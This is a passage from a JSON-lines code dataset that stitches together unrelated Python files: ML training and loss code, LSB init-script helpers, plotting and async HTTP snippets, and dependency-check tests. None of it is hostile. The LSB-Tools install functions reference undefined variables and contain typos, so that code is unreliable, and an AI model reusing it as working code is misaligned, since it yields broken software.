e.g. 
\"B_16_384\")', default='B_16_384')\n argparser.add_argument('--pretrained_weights', type=str, help='Pre-trained weights filename.', default=None)\n argparser.add_argument('--freeze_extractor', type=bool, help='If True, freeze the feature extractor weights.', default=True)\n \n # training\n argparser.add_argument('--batch_size', type=int, help='Batch size.', default=64)\n argparser.add_argument('--init_lr', type=float, help='Initial learning rate.', default=1e-3) \n argparser.add_argument('--weight_decay', type=float, help='Weight decay (L2 penalty).', default=1e-5)\n argparser.add_argument('--beta1', type=float, help='Adam `betas` param 1.', default=0.9)\n argparser.add_argument('--beta2', type=float, help='Adam `betas` param 2.', default=0.999) \n argparser.add_argument('--max_epoch', type=int, help='Maximun training epochs.', default=100)\n argparser.add_argument('--patient', type=int, help='Improved patient for early stopping', default=None)\n argparser.add_argument('--monitor', type=str, help='Metric to be monitored', choices=['loss', 'acc'], default='loss')\n argparser.add_argument('--min_delta', type=float, help='Minimum change in the monitored metric to qualify as an improvement', default=0.)\n argparser.add_argument('--save_best', type=bool, help='Whether to save weights from the epoch with the best monitored metric', default=True)\n argparser.add_argument('--warmup', type=int, help='Warmup epochs.', default=0)\n argparser.add_argument('--scheduler', type=str, help='Training scheduler.', choices=['cosine', 'step', 'exp'], default=None)\n argparser.add_argument('--t_max', type=int, help='Maximum number of iterations (cosine).', default=10)\n argparser.add_argument('--eta_min', type=float, help='Minimum learning rate. (cosine)', default=0.)\n argparser.add_argument('--step_size ', type=int, help='Period of learning rate decay. (step)', default=10)\n argparser.add_argument('--gamma', type=float, help='Multiplicative factor of learning rate decay. (step/exp)', default=0.1)\n\n # augmentation\n argparser.add_argument('--image_size', type=int, help='Input image size.', default=384)\n argparser.add_argument('--crop_margin', type=int, help='Margin for random cropping.', default=32)\n argparser.add_argument('--horizontal_flip', type=float, help='Horizontal flip prob.', default=0.5)\n argparser.add_argument('--rotation', type=float, help='Degree for random rotation.', default=10.)\n argparser.add_argument('--device', type=str, help='Computation device.', default='cuda')\n argparser.add_argument('--random_seed', type=int, help='Random seed in this repo.', default=427)\n \n args = argparser.parse_args()\n main(args)\n","repo_name":"godofpdog/ViT_PyTorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"44"} +{"seq_id":"17346888279","text":"import math\nimport torch\nimport torch.nn.functional as F\n\nfrom fairseq import utils, metrics\n\nfrom . import FairseqCriterion, register_criterion\n\n\n@register_criterion('knowledge_distillation')\nclass CrossEntropyKnowledgeDistillationCriterion(FairseqCriterion):\n\n def __init__(self, args, task):\n super().__init__(task)\n # Lambda ranges between 0.0 and 1.0. 0.0 means that we only use the ground\n # truth labels (ie. 
it is the same as the normal cross entropy); 1.0 means\n # that only the teacher output is taken in account.\n self._lambda = args.kd_lambda\n self.temperature = args.kd_temperature\n self.sentence_avg = args.sentence_avg\n\n @classmethod\n def build_criterion(cls, args, task):\n return cls(args, task)\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add criterion-specific arguments to the parser.\"\"\"\n parser.add_argument('--kd-lambda', default=0., type=float, metavar='D',\n help='Value for lambda in Knowledge Distillation '\n '(ie. the weight of teacher output vs ground truth)')\n parser.add_argument('--kd-temperature', default=1., type=float, metavar='D',\n help='Temperature to be used. Temperature is used to soften the nets '\n 'output in order to increase the dark knowledge effect. A temperature '\n ' of 1 (default), is equivalent not to use the temperature.')\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n target = model.get_targets(sample, net_output).view(-1)\n\n # KD from the teacher\n if self._lambda > 0.0:\n net_output_scaled = (net_output[0] / self.temperature, net_output[1])\n lprobs = model.get_normalized_probs(net_output_scaled, log_probs=True)\n lprobs = lprobs.view(-1, lprobs.size(-1))\n teacher_idxs = sample['teacher_output'][0]\n teacher_outs = sample['teacher_output'][1]\n teacher_probs = F.softmax(teacher_outs / self.temperature, dim=-1)\n teacher_idxs = teacher_idxs.view(-1, teacher_idxs.shape[-1])\n teacher_probs = teacher_probs.view(-1, teacher_probs.shape[-1])\n\n lprobs_selected = lprobs.gather(dim=-1, index=teacher_idxs.long())\n teacher_loss = - (lprobs_selected * teacher_probs).sum(dim=-1)\n\n # Ignore paddings\n mask = target != self.padding_idx\n teacher_loss = teacher_loss * mask.type(teacher_loss.dtype)\n else:\n teacher_loss = 0.0\n\n if self._lambda < 1.0:\n lprobs = model.get_normalized_probs(net_output, log_probs=True)\n lprobs = lprobs.view(-1, lprobs.size(-1))\n truth_loss = F.nll_loss(\n lprobs, target, size_average=False, ignore_index=self.padding_idx, reduce=False)\n else:\n truth_loss = 0.0\n\n if isinstance(teacher_loss, torch.Tensor) and isinstance(truth_loss, torch.Tensor):\n assert teacher_loss.shape == truth_loss.shape\n loss = (1.0 - self._lambda) * truth_loss + self._lambda * teacher_loss\n\n sample_size = sample['target'].size(0) if self.sentence_avg else sample['ntokens']\n if reduce:\n loss = loss.sum()\n logging_output = {\n 'loss': loss.data,\n 'ntokens': sample['ntokens'],\n 'nsentences': sample['target'].size(0),\n 'sample_size': sample_size,\n }\n return loss, sample_size, logging_output\n\n @staticmethod\n def logging_outputs_can_be_summed() -> bool:\n \"\"\"\n Whether the logging outputs returned by `forward` can be summed\n across workers prior to calling `reduce_metrics`. 
Setting this\n to True will improves distributed training speed.\n \"\"\"\n return True\n\n @classmethod\n def reduce_metrics(cls, logging_outputs):\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n loss_sum = utils.item(sum(log.get('loss', 0) for log in logging_outputs))\n ntokens = utils.item(sum(log.get('ntokens', 0) for log in logging_outputs))\n sample_size = utils.item(sum(log.get('sample_size', 0) for log in logging_outputs))\n\n metrics.log_scalar('loss', loss_sum / sample_size / math.log(2), sample_size, round=3)\n if sample_size != ntokens:\n metrics.log_scalar('nll_loss', loss_sum / ntokens / math.log(2), ntokens, round=3)\n metrics.log_derived('ppl', lambda meters: utils.get_perplexity(meters['nll_loss'].avg))\n else:\n metrics.log_derived('ppl', lambda meters: utils.get_perplexity(meters['loss'].avg))\n","repo_name":"mgaido91/FBK-fairseq-ST","sub_path":"fairseq/criterions/knowledge_distillation.py","file_name":"knowledge_distillation.py","file_ext":"py","file_size_in_byte":5008,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"44"} +{"seq_id":"22691506885","text":"# Begin lsbtools/__init__.py\n\nimport glob, itertools, os, re, sys\nfrom io import StringIO\n\n# Treat LSB headers just like RFC 2822 (email headers)\n# Derived from RFC822Parser from Debain initdutils.py\nclass ParseHeaders(dict):\n \"A dictionary-like object.\"\n __linere = re.compile(r'([^:]+):\\s*(.*)$')\n def __init__(self, fileob=None, strob=None, startcol=0, basedict=None):\n if fileob is None and strob is None:\n raise ValueError('need a file or string')\n if not basedict:\n basedict = {}\n super(ParseHeaders, self).__init__(basedict)\n if not fileob:\n fileob = StringIO(strob)\n key = None\n for line in fileob:\n if startcol:\n line = line[startcol:]\n if not line.strip():\n continue\n # Continuation line\n if line[0].isspace():\n if not key:\n continue\n self[key] += '\\n' + line.strip()\n continue\n m = self.__linere.match(line)\n if not m:\n # Not a valid header\n continue\n key, value = m.groups()\n self[key] = value.strip()\n\n\nbeginre = re.compile(re.escape('### BEGIN INIT INFO'))\nendre = re.compile(re.escape('### END INIT INFO'))\n\n# Derived from scan_intifile() from Debian initdutils.py\ndef scan_headers(initfile, debug):\n headerlines = ''\n scanning = False\n for line in open(initfile):\n line = line.rstrip()\n if beginre.match(line):\n scanning = True\n continue\n elif scanning and endre.match(line):\n scanning = False\n continue\n elif not scanning:\n continue\n if line.startswith('# '):\n headerlines += line[2:] + '\\n'\n elif line.startswith('#\\t'):\n headerlines += line[1:] + '\\n'\n inheaders = ParseHeaders(strob=headerlines)\n headers = {}\n for header, body in inheaders.items():\n # Ignore empty headers\n if not body.strip():\n continue\n if header in ('Provides',\n 'Required-Start', 'Required-Stop',\n 'Should-Start', 'Should-Stop',\n 'Default-Start', 'Default-Stop'):\n headers[header] = body.split()\n else:\n headers[header] = body\n return headers\n\n\ndef find_index(listname, scriptname):\n index = 0\n if scriptname == \"98\":\n return (len(listname) - 1)\n if scriptname == \"01\":\n return 0\n while index < len(listname):\n if listname[index][0] == scriptname:\n return index\n index += 1\n # If we didn't find it, return a predictable number\n return 1000\n\n\ndef find_initd_dir():\n if os.path.exists(\"/etc/init.d\"):\n if os.path.islink(\"/etc/init.d\"):\n initdDir = os.path.realpath(\"/etc/init.d\")\n else:\n 
initdDir = \"/etc/init.d\"\n elif os.path.exists(\"/etc/rc.d/init.d\"):\n initdDir = \"/etc/rc.d/init.d\"\n else:\n print(\"Unable to locate init.d directory! Exiting...\", file=sys.stderr)\n sys.exit(2)\n return initdDir\n\n\ndef find_rc_base_dir():\n if os.path.exists(\"/etc/rc.d\"):\n if os.path.islink(\"/etc/rc.d\"):\n rcdDir = os.path.realpath(\"/etc/rc.d\")\n else:\n rcdDir = \"/etc/rc.d\"\n else:\n print(\"Unable to locate rc.d directory! Exiting...\", file=sys.stderr)\n sys.exit(3)\n return rcdDir\n\n\ndef find_font_dir():\n lsb_fontdir = \"/usr/share/fonts/lsb\"\n if not os.path.exists(lsb_fontdir):\n os.mkdir(lsb_fontdir)\n os.chmod(lsb_fondir, 0o755)\n return lsb_fontdir\n\n\ndef get_matrix(initdDir, debug):\n matrix = []\n for filename in os.listdir(initdDir):\n headers = scan_headers(os.path.join(initdDir, filename), debug)\n provides = headers.get('Provides', [])\n reqstart = headers.get('Required-Start', [])\n reqstop = headers.get('Required-Stop', [])\n shouldstart = headers.get('Should-Start', [])\n shouldstop = headers.get('Should-Stop', [])\n defstart = headers.get('Default-Start', [])\n defstop = headers.get('Default-Stop', [])\n if filename != \"template\" and filename != \"rc\":\n matrix.append([filename, provides, reqstart, reqstop, shouldstart, shouldstop, defstart, defstop,])\n return matrix\n\ndef get_prog_ver(strprogram):\n progver = strprogram + \" \" + \" (LSB-Tools-0.10)\"\n return progver\n\ndef install_font(argobject):\n fontDir = lsbtools.find_font_dir()\n aobject = os.path.basename(argsobject).strip(\" \")\n fontfile = os.path.join(fontDir, aobject)\n if os.path.exists(fontfile):\n if check == 1:\n print(fontfile, \"exists in filesystem.\")\n sys.exit(0)\n elif remove == 1:\n os.remove(fontfile)\n print(fontfile, \"successfully removed.\")\n sys.exit(0)\n else:\n print(\"Error:\", fontfile, \"already exists in filesystem. Exiting...\", file=sys.stderr)\n sys.exit(1)\n else:\n if check == 1:\n print(fontfile, \"does not exist in filesystem.\")\n sys.exit(1)\n elif remove == 1:\n print(fontfile, \"does not exist in filesystem. No need to remove.\")\n sys.exit(0)\n else:\n copyfile(argsobject, fontDir)\n os.chmod(fontfile, 0o644)\n sys.exit(0)\n\ndef install_init(argobject):\n initdDir = lsbtools.find_initd_dir()\n aobject = os.path.basename(argsobject).strip(\" \")\n initfile = os.path.join(initdDir, aobject)\n if os.path.exists(initfile):\n if check == 1:\n print(initfile, \"exists in filesystem.\")\n sys.exit(0)\n elif remove == 1:\n os.remove(initfile)\n print(initfile, \"successfully removed.\")\n sys.exit(0)\n else:\n print(\"Error:\", initfile, \"already exists in filesystem. Exiting...\", file=sys.stderr)\n sys.exit(1)\n else:\n if check == 1:\n print(initfile, \"does not exist in filesystem.\")\n sys.exit(1)\n elif remove == 1:\n print(initfile, \"does not exist in filesystem. No need to remove.\")\n sys.exit(0)\n else:\n copyfile(argsobject, initdDir)\n os.chmod(initfile, 0o644)\n sys.exit(0)\n\ndef install_profile(argobject):\n profileDir = \"/etc/profile.d\"\n aobject = os.path.basename(argsobject).strip(\" \")\n profilefile = os.path.join(profileDir, aobject)\n if os.path.exists(profilefile):\n if check == 1:\n print(profilefile, \"exists in filesystem.\")\n sys.exit(0)\n elif remove == 1:\n os.remove(profilefile)\n print(initfile, \"successfully removed.\")\n sys.exit(0)\n else:\n print(\"Error:\", profilefile, \"already exists in filesystem. 
Exiting...\", file=sys.stderr)\n sys.exit(1)\n else:\n if check == 1:\n print(profilefile, \"does not exist in filesystem.\")\n sys.exit(1)\n elif remove == 1:\n print(profilefile, \"does not exist in filesystem. No need to remove.\")\n sys.exit(0)\n else:\n copyfile(argsobject, profileDir)\n os.chmod(profilefile, 0o644)\n sys.exit(0)\n\ndef install_service(argobject):\n portproto = argobject[0].split(\"/\")\n if len(portproto) != 2:\n print(\"Invalid syntax! The first argument of type service must be in port/proto\\nformat, followed by service name and any aliases. Ex: 80/tcp http webserver\")\n portservice = argobject[1]\n if len(argobject) > 2:\n servalias = ''\n count=2\n while count < len(argobject):\n servalias = servalias + argobject[count] + ' '\n count += 1\n if check == 1:\n try:\n portcheck = socket.getservbyname(portservice, portproto[1])\n except OSError:\n portcheck = 'error'\n try:\n namecheck = socket.getservbyport(int(portproto[0]), portproto[1])\n except OSError:\n namecheck = 'error'\n if portcheck == portproto[0] and namecheck == portservice:\n print(\"Service\", portservice, \"with port\", portproto[0], \"on protocol\", portproto[1], \"exists.\")\n sys.exit(0)\n if remove == 1:\n print(\"Service removal is not currently supported. Exiting...\", file=sys.stderr)\n sys.exit(1)\n\n if servalias == '':\n print(\"Adding service\", portservice, \"with port\", portproto[0], \"on protocol\", portproto[1])\n else:\n print(\"Adding service\", portservice, \"with port\", portproto[0], \"on protocol\", portproto[1], \"with aliases:\", servalias)\n try:\n nameservice = socket.getservbyport(int(portproto[0]), portproto[1])\n except OSError:\n nameservice = 'error'\n if portservice != nameservice:\n namesp = 25 - len(portservice) - len(argobject[0])\n fmtstr = portservice\n count = 0\n while count < namesp:\n fmtstr = fmtstr + ' '\n count += 1\n fmtstr = fmtstr + argobject[0]\n servicesfile=open(\"/etc/services\", \"a\")\n servicesfile.write(\"%s\\r\\n\", fmtstr)\n servicesfile.close()\n sys.exit(0)\n else:\n print(\"Service\", portservice, \"with port\", portproto[0], \"on protocol\", portproto[1], \"exists.\")\n sys.exit(0)\n\ndef install_inet(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_crontab(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_package(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_menu(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_ldconfig(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_man(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\n","repo_name":"lfs-book/LSB-Tools","sub_path":"lsbtools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71914000133","text":"from KratosMultiphysics import *\nimport KratosMultiphysics.PfemFluidDynamicsApplication as PfemFluid\nfrom KratosMultiphysics import gid_output_process\n\nclass GiDOutputProcess(gid_output_process.GiDOutputProcess):\n\n def __init__(self, model_part, file_name, param=None):\n super().__init__(model_part, file_name, param)\n self.do_first_output = True\n\n def _InitializeGiDIO(self,gidpost_flags,param):\n '''Initialize GidIO objects (for volume and cut outputs) and related data.'''\n self.volume_file_name = self.base_file_name\n self.cut_file_name = self.volume_file_name+\"_cuts\"\n self.post_mode = 
self.__get_gidpost_flag(param, \"GiDPostMode\", self.__post_mode)\n self.write_deformed_mesh = self.__get_gidpost_flag(param, \"WriteDeformedMeshFlag\", self.__write_deformed_mesh)\n self.write_conditions = self.__get_gidpost_flag(param,\"WriteConditionsFlag\",self.__write_conditions)\n self.multifile_flag = self.__get_gidpost_flag(param,\"MultiFileFlag\", self.__multi_file_flag)\n\n if self.body_output or self.node_output:\n self.body_io = PfemFluid.PfemFluidGidIO( self.volume_file_name,\n self.post_mode,\n self.multifile_flag,\n self.write_deformed_mesh,\n self.write_conditions)\n\n if self.skin_output or self.num_planes > 0:\n self.cut_io = PfemFluid.PfemFluidGidIO(self.cut_file_name,\n self.post_mode,\n self.multifile_flag,\n self.write_deformed_mesh,\n WriteConditionsFlag.WriteConditionsOnly) # Cuts are conditions, so we always print conditions in the cut ModelPart\n\n def IsOutputStep(self):\n\n if self.do_first_output:\n self.do_first_output = False\n return True\n else:\n return self.controller.Evaluate()\n\n def PrintOutput(self):\n if self.point_output_process is not None:\n self.point_output_process.ExecuteBeforeOutputStep()\n\n # Print the output\n time = self.__get_pretty_time(self.model_part.ProcessInfo[TIME])\n # self.printed_step_count += 1\n self.model_part.ProcessInfo[PRINTED_STEP] = self.printed_step_count\n\n tolerance=0.0000000000001\n if (time angle brackets\n# < bra > ket in greek\n\n# Creates a list and then prints a specific item from the list\nlistvar1 = [\"meat\", \"veg\", \"cake\", \"beer for the weekend\", 20]\n# 0 1 2 3 4\n# -4 -3 -2 -1 0\n\nlistvar1.append(\"pies\")\nlistvar1.insert(1, \"pies\")\nlistvar1.remove(\"veg\")\nlistvar1.count(\"veg\")\n#counts how many things are in the list be careful with the count function\nprint(len(listvar1))\nprint(listvar1)\n\n\ncool_cows = [\"Winnie the moo\", \"Moolan\", \"Milkshake\", \"Mooana\"]\ncool_sheep = [\"Baaaart\", \"Baaaarnaby\"]\ncool_pigs = [\"Chris P. Bacon\", \"Hamlet\", \"Hogwarts\"]\n\ncool_animals = [cool_cows, cool_sheep, cool_pigs]\n\nprint(cool_animals[1][1])\n\nlistvar1.append(\"pies\")\n","repo_name":"PhantomW0rm/Python-Projects","sub_path":"lists-collections.py","file_name":"lists-collections.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37456679992","text":"def optimize_prompt(prompt):\n filler_words = [\"just\", \"really\", \"very\", \"actually\"] # List of filler words\n\n # Remove filler words from the prompt\n optimized_prompt = ' '.join(word for word in prompt.split() if word.lower() not in filler_words)\n\n # Simplify sentence structures\n sentences = optimized_prompt.split(\".\")\n simplified_sentences = [s.strip() for s in sentences if s.strip()]\n optimized_prompt = \". 
\".join(simplified_sentences)\n\n # Use pronouns\n pronoun_mapping = {\"programming languages\": \"them\", \"section\": \"it\"}\n for key, value in pronoun_mapping.items():\n optimized_prompt = optimized_prompt.replace(key, value)\n\n return optimized_prompt\n\n# Example usage\nprompt = \"write a code in python to make a pie chart of given input of programming languages with their popularity and have section with distinct color and also make one section pop out\"\noptimized_prompt = optimize_prompt(prompt)\nprint(optimized_prompt)\n","repo_name":"aditya1792/Prompt","sub_path":"Promt.py","file_name":"Promt.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73473743494","text":"from pathlib import Path\nimport h5py\nimport matplotlib.pyplot as plt\nimport sys\n\nfilename = Path(sys.argv[-1])\n\ndf = h5py.File(str(filename), 'r')\nt = df['scales/sim_time'][:]\n\nTE = df['tasks/Energy_x'][:,0,0,0] + df['tasks/Energy_y'][:,0,0,0] + df['tasks/Energy_z'][:,0,0,0]\nTEns = df['tasks/Enstrophy_x'][:,0,0,0] + df['tasks/Enstrophy_y'][:,0,0,0] + df['tasks/Enstrophy_z'][:,0,0,0]\n\nplt.figure(figsize=(8,16))\nplt.subplot(3,1,1)\nplt.plot(t, df['tasks/Energy_x'][:,0,0,0], label='x')\nplt.plot(t, df['tasks/Energy_y'][:,0,0,0], label='y')\nplt.plot(t, df['tasks/Energy_z'][:,0,0,0], label='z')\nplt.plot(t, TE, color='k', linewidth=2, label='total')\nplt.legend()\nplt.xlabel(\"time\")\nplt.ylabel(\"Energy\")\n\nplt.subplot(3,1,2)\nplt.plot(t, df['tasks/Nusselt'][:,0,0,0])\nplt.xlabel(\"time\")\nplt.ylabel(\"Nusselt\")\n\nplt.subplot(3,1,3)\nplt.plot(t, df['tasks/Enstrophy_x'][:,0,0,0], label='x')\nplt.plot(t, df['tasks/Enstrophy_y'][:,0,0,0], label='y')\nplt.plot(t, df['tasks/Enstrophy_z'][:,0,0,0], label='z')\nplt.plot(t, TEns, color='k', linewidth=2, label='total')\nplt.legend()\nplt.xlabel(\"time\")\nplt.ylabel(\"Enstrophy\")\n\nplt.tight_layout()\nparent = filename.parent\nplt.savefig(str(parent/\"energies.png\"), dpi=300)\n\n","repo_name":"jsoishi/wall_modes_topology","sub_path":"python/plot_timeseries.py","file_name":"plot_timeseries.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31342627494","text":"import json\nimport requests\nimport asyncio\nimport aiohttp\nimport limiter\n\ndef get_cat_fact(num):\n url='https://catfact.ninja/fact'\n print(f'Request {num} started.')\n response=requests.get(url)\n print (f'Request {num} finished. Status {response.status_code}.')\n if response.status_code==200: \n obj=json.loads(response.text)\n return obj['fact']\n else:\n raise NotImplementedError(\"A response was had a status othern than 200. Only 200 has been implemented.\")\n\ndef sync_get(url,i):\n print(f'Request {i} started.')\n response=requests.get(url)\n print (f'Request {i} finished. Status {response.status_code}.')\n\nasync def async_get(session, url,i):\n print(f'Request {i} started.')\n response=await session.get(url)\n print (f'Request {i} finished. 
Status {response.status}.')\n\n return response\n \nasync def get_cat_fact_async(num):\n url='https://catfact.ninja/fact'\n results=[]\n async with aiohttp.ClientSession() as session:\n \n tasks=[]\n for i in range(num):\n tasks.append(async_get(session,url,i))\n\n responses= await asyncio.gather(*tasks) \n count=0 \n for response in responses:\n status=response.status\n if status==200:\n json=await response.json()\n results.append(json['fact'])\n count+=1\n print(f'Successful count = {count}')\n \n return results\n\n\n\nasync def get_cat_fact_async_with_limit(num):\n url='https://catfact.ninja/fact'\n results=[]\n for i in range(num):\n options=limiter.RequestOptions(url,'GET',i)\n limiter.q.put(options)\n \n limiter.q.put(None) ## signal that the batch is over\n limiter.event.wait() \n responses= limiter.results.copy()\n limiter.results=[]\n limiter.event.clear()\n count=0 \n for response in responses:\n status=response.status\n if status==200:\n json=await response.json()\n results.append(json['fact'])\n count+=1\n print(f'Successful count = {count}')\n \n return results\n","repo_name":"ChristosCh00/flask_async_example","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31881230052","text":"from math import floor, ceil\n\ndef IsLeapYear(val):\n if (val % 100) == 0:\n if (val % 400) == 0:\n return True\n else:\n return False\n if (val % 4) == 0:\n return True\n\n return False\n#------------------------------------------------------\n\ndef GetMonthDay(yearVal, monthVal):\n if monthVal in [1,3,5,7,8,10,12]:\n return 31\n if monthVal in [4,6,9,11]:\n return 30\n if IsLeapYear(yearVal):\n return 29\n\n return 28\n#------------------------------------------------------\n\n# Week day from Monday to Sunday: 1 to 7\nweekDayOfFirstDay = 2\nsum_FirstDayIsSunday = 0\nfor yearNum in range(1901, 2001):\n for monthNum in range(1, 13):\n print('Year %d Month %d, weekday %d' % (yearNum, monthNum, weekDayOfFirstDay))\n if (weekDayOfFirstDay == 7):\n sum_FirstDayIsSunday += 1\n # Calculate the weekday of the first day of next month\n monthDay = GetMonthDay(yearNum, monthNum)\n weekDayOfFirstDay += monthDay % 7\n if (weekDayOfFirstDay > 7):\n weekDayOfFirstDay = weekDayOfFirstDay % 7\n\n\nprint('Total First day of a month is Sunday from 1900 to 2000 is %d' % sum_FirstDayIsSunday)","repo_name":"crusaderg/Euler-Project","sub_path":"quiz19.py","file_name":"quiz19.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"1314864879","text":"import pkg_resources\nfrom pkg_resources import DistributionNotFound, VersionConflict\n\nfrom src.utils import remove\nfrom tests.utils import wrap_test_forked\n\n\ndef get_all_requirements():\n import glob\n requirements_all = []\n reqs_http_all = []\n for req_name in ['requirements.txt'] + glob.glob('reqs_optional/req*.txt'):\n requirements1, reqs_http1 = get_requirements(req_name)\n requirements_all.extend(requirements1)\n reqs_http_all.extend(reqs_http1)\n return requirements_all, reqs_http_all\n\n\ndef get_requirements(req_file=\"requirements.txt\"):\n req_tmp_file = req_file + '.tmp.txt'\n try:\n\n reqs_http = []\n\n with open(req_file, 'rt') as f:\n contents = f.readlines()\n with open(req_tmp_file, 'wt') as g:\n for line in contents:\n if 'http://' not in line and 'https://' not in line:\n g.write(line)\n else:\n 
reqs_http.append(line.replace('\\n', ''))\n reqs_http = [x for x in reqs_http if x]\n print('reqs_http: %s' % reqs_http, flush=True)\n\n with open(req_tmp_file, \"rt\") as f:\n requirements = pkg_resources.parse_requirements(f.read())\n finally:\n remove(req_tmp_file)\n return requirements, reqs_http\n\n\n@wrap_test_forked\ndef test_requirements():\n \"\"\"Test that each required package is available.\"\"\"\n packages_all = []\n packages_dist = []\n packages_version = []\n packages_unkn = []\n\n requirements, reqs_http = get_all_requirements()\n\n for requirement in requirements:\n try:\n requirement = str(requirement)\n pkg_resources.require(requirement)\n except DistributionNotFound:\n packages_all.append(requirement)\n packages_dist.append(requirement)\n except VersionConflict:\n packages_all.append(requirement)\n packages_version.append(requirement)\n except pkg_resources.extern.packaging.requirements.InvalidRequirement:\n packages_all.append(requirement)\n packages_unkn.append(requirement)\n\n packages_all.extend(reqs_http)\n if packages_dist or packages_version:\n print('Missing packages: %s' % packages_dist, flush=True)\n print('Wrong version of packages: %s' % packages_version, flush=True)\n print(\"Can't determine (e.g. http) packages: %s\" % packages_unkn, flush=True)\n print('\\n\\nRUN THIS:\\n\\n', flush=True)\n print(\n 'pip uninstall peft transformers accelerate -y ; CUDA_HOME=/usr/local/cuda-11.7 pip install %s --upgrade' % str(\n ' '.join(packages_all)), flush=True)\n print('\\n\\n', flush=True)\n\n raise ValueError(packages_all)\n\n\nimport requests\nimport json\n\ntry:\n from packaging.version import parse\nexcept ImportError:\n from pip._vendor.packaging.version import parse\n\nURL_PATTERN = 'https://pypi.python.org/pypi/{package}/json'\n\n\ndef get_version(package, url_pattern=URL_PATTERN):\n \"\"\"Return version of package on pypi.python.org using json.\"\"\"\n req = requests.get(url_pattern.format(package=package))\n version = parse('0')\n if req.status_code == requests.codes.ok:\n j = json.loads(req.text.encode(req.encoding))\n releases = j.get('releases', [])\n for release in releases:\n ver = parse(release)\n if not ver.is_prerelease:\n version = max(version, ver)\n return version\n\n\n@wrap_test_forked\ndef test_what_latest_packages():\n # pip install requirements-parser\n import requirements\n import glob\n for req_name in ['requirements.txt'] + glob.glob('reqs_optional/req*.txt'):\n print(\"\\n File: %s\" % req_name, flush=True)\n with open(req_name, 'rt') as fd:\n for req in requirements.parse(fd):\n from importlib.metadata import version\n try:\n current_version = version(req.name)\n latest_version = get_version(req.name)\n if str(current_version) != str(latest_version):\n print(\"%s: %s -> %s\" % (req.name, current_version, latest_version), flush=True)\n except Exception as e:\n print(\"Exception: %s\" % str(e), flush=True)\n","repo_name":"h2oai/h2ogpt","sub_path":"tests/test_requirements.py","file_name":"test_requirements.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":8660,"dataset":"github-code","pt":"44"} +{"seq_id":"23928643262","text":"\"\"\"\nBase class and BaseError class.\n\nDefinitions for both the Base class, an abstract parent class\nfor all the other commands, as well as constant variables used\nthroughout the program, and a custom error class: BaseError.\n\nContact: jenniferhellar@gmail.com\n\nAuthors: Jennifer Hellar.\n\"\"\"\nimport os\nimport sys\n\nfrom .constants import 
SUPPORTED_TOOLCHAINS\n\n\nclass BaseError(Exception):\n \"\"\"Generic Exception class for handling errors.\"\"\"\n\n def __init__(self, msg):\n \"\"\"Print error message, exit program.\"\"\"\n super()\n print('ERROR: ' + str(msg))\n sys.exit(1)\n\n\nclass Base():\n \"\"\"\n Basic form of command.\n\n Creates structure for other command classes to follow by\n allowing all command classes to have access to the passed\n in arguments as well as file and toolchain validity checking\n functions.\n \"\"\"\n\n def __init__(self, options, *args, **kwargs):\n \"\"\"All commands have access to options defined by user.\"\"\"\n self.options = options\n self.args = args\n self.kwargs = kwargs\n\n def check_file_valid(self, file_path):\n \"\"\"Check if file exists and is not empty.\"\"\"\n file_name = os.path.basename(file_path)\n if not os.path.exists(file_path):\n raise BaseError('File {} does not exist'.format(file_name))\n\n if not os.path.getsize(file_path) > 0:\n raise BaseError('File {} is empty'.format(file_name))\n\n def check_toolchain_valid(self, toolchain):\n \"\"\"Check if toolchain supported.\"\"\"\n toolchain = toolchain.lower()\n input_toolchain_supported = False\n for tool in SUPPORTED_TOOLCHAINS:\n if toolchain == tool:\n input_toolchain_supported = True\n\n if input_toolchain_supported is False:\n raise BaseError('Requested toolchain {} is not supported by Hydra. Supported toolchains are: {}' \\\n .format(toolchain, ', '.join(SUPPORTED_TOOLCHAINS)))\n\n def run(self):\n \"\"\"Conceptually pure virtual function for override in child classes.\"\"\"\n raise NotImplementedError('Subclass Base and implement run!')\n","repo_name":"rvru/rvr-hydra","sub_path":"hydra/commands/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"75247421893","text":"import torch\nfrom attention import *\nfrom sklearn.model_selection import train_test_split\nimport random\nimport time\n\n# declare variables for timing\n# declare variables for timing\ntotalLinesLeft = 0\ntimePerLine = 0\ntimeLeft = timePerLine*totalLinesLeft\ntotalstarttime = time.time()\nepochstartTime = time.time()\n\ndef trainModel(m, opt, inputData, targetData):\n '''\n Input of Model, optimizer, inputData, and targetData\n Will output Model and optimizer\n Ret: (model, optimizer)\n '''\n # shuffle data\n traindata = list(zip(inputData, targetData))\n 